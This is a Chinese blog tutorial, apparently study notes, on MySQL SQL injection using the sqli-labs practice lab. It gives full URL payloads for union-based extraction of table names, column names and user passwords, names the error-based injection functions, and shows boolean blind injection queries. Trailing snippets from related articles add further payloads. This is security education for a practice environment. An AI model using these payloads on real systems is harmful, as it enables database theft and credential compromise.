Sql注入

已于 2022-03-19 19:04:50 修改
阅读量1.4k 收藏 1
点赞数 1
文章标签: 数据库 mysql database
于 2022-01-24 12:17:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aetlypdlg_ys/article/details/122662470
版权

目录

 

联合注入

判断注入点

判断显示位(列)

联合查询

报错注入

extractvalue()

updatexml()

盲注

联合注入

判断注入点

GET['id']

?id=n

eg:127.0.0.1/sqli-labs/Less-1/?id=1

%23(#):过滤后面的语句

eg:127.0.0.1/sqli-labs/Less-1/?id=1' %23

加 ' 报错,再加%23(#)不报错,可判断一个注入点

整型注入:注入的是1,2,3......

字符型注入:注入的是a,b,c,def......

判断显示位(列)

order by n

n>列数 -->报错

n<=列数 -->不报错

eg:127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 %23

联合查询

union select

eg:127.0.0.1/sqli-labs/Less-1/?id=n' union select 1,2,3 %23

n为不存在的id

可在显示的数字与查询的数字一样的位置使用注入语句

如想爆它的库,用database()

eg:127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,database() %23可得库名security

group_concat:将一列数据拼接成一排

eg:127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat() %23

mysql中有一个information_schema,它记录了所有数据库的表名和列名,可查它来获得相应库下的表名,列名。

如查security的表、列名:

step:

爆表名:127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' %23

爆列名:127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' %23

爆数据:127.0.0.1/sqli-labs/Less-1/?id=0' union select 1,2,group_concat(password) from users %23

报错注入

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU0lDTlUtQ1M=,size_20,color_FFFFFF,t_70,g_se,x_16

extractvalue()

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU0lDTlUtQ1M=,size_20,color_FFFFFF,t_70,g_se,x_16

updatexml()

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU0lDTlUtQ1M=,size_20,color_FFFFFF,t_70,g_se,x_16

extractvalue()和updatexml()返回数据的长度有限制,为32位 

mysql right函数

right(s,n):返回字符串s最右边的n个字符

盲注

盲注通常来讲分为布尔盲注和时间盲注,我们这里主要讲布尔盲注。

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU0lDTlUtQ1M=,size_20,color_FFFFFF,t_70,g_se,x_16

 watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU0lDTlUtQ1M=,size_20,color_FFFFFF,t_70,g_se,x_16

第一种页面即代表数据存在或者你传递的参数是正确的,所以这个时候我们可以用length()函数来判断长度 ,当我们传递id=1' and length(database())>3时,该语句判断数据库名长度是否大于3,如果大于则返回第一个页面

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAU0lDTlUtQ1M=,size_20,color_FFFFFF,t_70,g_se,x_16

 所以我们就可以通过修改参数来获得数据库名长度。

之后我们可以构造另一个注入语句,id=1' and ascii(substr((database()),1,1))>1 --+

这个则是判断数据库名的第一个字符所对应的ascii码是否大于1,符合则返回第一个页面,然后我们就可以一个一个试,最后得到所有字符的ascii码,然后得到想要的数据。

 

寻你的声响
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试23---SQL注入实战2
初遇我ㄖ寸の热情呢?
04-14 7788
1.SQL盲注 盲注就是有些信息看不到了,通过一些特别的技巧啊。利用逻辑判断,往往页面上只是简单的提示成功不成功。没有详细的具体的信息。 报错的信息盲注就是,什么信息都没有。但是系统还是有缺陷的。如果在运行过程中,里面出现一些额外的信息报错了,那也会回显出来。 基于时间的盲注,通过时间长短的变化,判断语句是否执行成功 布尔型盲注 猜数据库名 uname=admin" and left(da...
网址URL特殊字符编码
mijichui2153的博客
04-08 6399
一、URL中的特殊字符及其对应的编码 网址URL中特殊字符转义编码 字符 - URL编码值 空格 - %20 " - %22 # - %23 % - %25 & - %26 ( - %28 ) - %29 + ...
SQL注入详解 23-28关
君莫hacker的博客
10-08 661
目录Less-23Less-24Less-25Less-26Less-27Less-28Less-29Less-30Less-31Less-32Less-33Less-34Less-35Less-36 Less-23 确定注入类型并判断显示位置 -1' union select 22,33,44 and '1'='1 查看当前数据库 -1' union select 3,database(),3 or '12'='12 爆表 -1' union select 22,group_conca
SQL注入分析
zhangmiaoping23的专栏
11-22 1297
检测诸如点: Request URI: /***.asp?id=16' and char(124)+user+char(124)=0 and ''=' Request URI: /***.asp?id=16 and 1=1 检测的URL: Request URI: /***..asp?id=234' and char(124)+user+char(124)=0 and ''=' Requ
SQL增删改查 及 拼接GROUP_CONCAT使用
clearlove_lwc的博客
08-14 116
SQL增删改查参考链接:https://www.cnblogs.com/yangming1996/p/10416499.html GROUP_CONCAT用于将多个查询结果连接成字符串参考连接:https://blog.csdn.net/k0307x1990y/article/details/829050
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三关,SQLi-LABS Less-23,SQLi-LABS Less 23,SQLiLABS Less23,SQLi Less 23
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
metinfo 后台sql注入1
08-03
《MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
Web渗透测试之SQL注入:Level3--闭合与注释
vodkaDL的博客
11-02 939
文章目录前言题目分析闭合与注释总结 前言 在这次拖库过程中你非常幸运的没被其他管理员发现,但在了解了库里内容后你又觉得非常无趣,于是跳槽到了另一家网站做管理员。虽然这次给你的权限同样非常低,但有了前两次的经验,你也就觉得无所谓了。于是趁中午大伙都出去吃饭的空档干起了你的老本行。 题目分析 闭合与注释 总结 ...
SqliLab_Mysql_Injection详解_字符型注入(九)_过滤绕过_二次注入(23~28a)
qq_41260930的博客
10-31 912
1. SqliLab_Mysql_Injection详解_字符型注入(九) 1.1. SQL注入_过滤绕过 1.2. 绕过姿势 1.2.1. 开启GPC**后一些绕过姿势: 单引号被转义: 1.2.2. 字符编码问题导致绕过: 设置数据库字符为gbk导致宽字节注入 //%df和%5c(\); 使用icon和mb_convert_encoding转码函数导致宽字节注入; 1.2.3. 编码解...
[极客大挑战 2019]LoveSQL
qq_37301470的博客
11-12 535
万能密码登录成功没有发现flag 判断藏在数据库里 check.php?username=1' or '1'='1&password=123456' or '1'='1 登陆成功返回的密码 7a2d6a8fd56b61a79bba61ee8f5ad02c 直接开始联合注入 check.php?username=1' union select 1,2,3%23&password=1 check.php?username=1' union select 1,2,database()%23&
关于百度搜索之后后面的%23%%%%是怎么出来的
hushengqiang的专栏
05-29 1862
我们在用百度进行搜索的时候,在地址栏会看到很多的%加上十六进制的数字,其实这是百度对这些关键字进行了编码,使用的当然了是utf-8编码,因为最近在做链接百度方面的项目,所以就了解了一下。再次我用java程序  实现了一下,其实还是很简单的。     编码: URLEncoder.encode("你好","utf-8");就可以得到编码之后的结果了 解码:   URLDecoder.deco
一些特殊字的ascii码
爱生活·爱Java
07-21 2652
%7 = ~%09 表示 Tab%20 表示 (1sp) 即一个space键%22 表示 "%23 表示 #%25 表示 %%26 表示 &%28 表示 (%29 表示 )%2B 表示 +%2C 表示 ,%2F 表示 /%3A 表示 :%3B 表示 ;%3C 表示 %3D 表示 =%3E 表示 >%3F 表示 ?%40 表示 @%5B 表示[%5C 表示 %5D 表示]%7C 表示 |%7E 表示
IOS手机端#被自动转义为%23导致链接错误的问题
jjfpx的博客
06-09 793
1.前端发送请求链接:https://applink.feishu.cn/client/web_app/open?appId=${appId}&path=mobile/%23/questionnaire&inventoryGroupId=1给后端。3.安卓链接正常显示,ios#符被转义%23导致链接访问404。2.后端拿到该链接发送给飞书机器人,飞书机器人在转发到手机端。解决方案:通过nginx配置将%23转回#即可访问资源。
url传参特殊字符问题(%#等)
热门推荐
zhang515745112的博客
09-01 1万+
java对文字进行编码涉及3个函数:escape,encodeURI,encodeURIComponent js中,你通过url传值,需要这样: function updatePLChild(name){  //先对参数进行编码  name = encodeURIComponent(name);  location.href="newLessonPlan.do?name="+na
最详细的SQL注入之报错注入
qq_62539372的博客
06-23 1万+
最详细的sql注入之报错注入,非常适合小白!!
sql注入sql注入
最新发布
05-02
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。攻击者可以利用这个漏洞来绕过身份验证、获取敏感数据、修改数据或者执行其他恶意操作。 为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值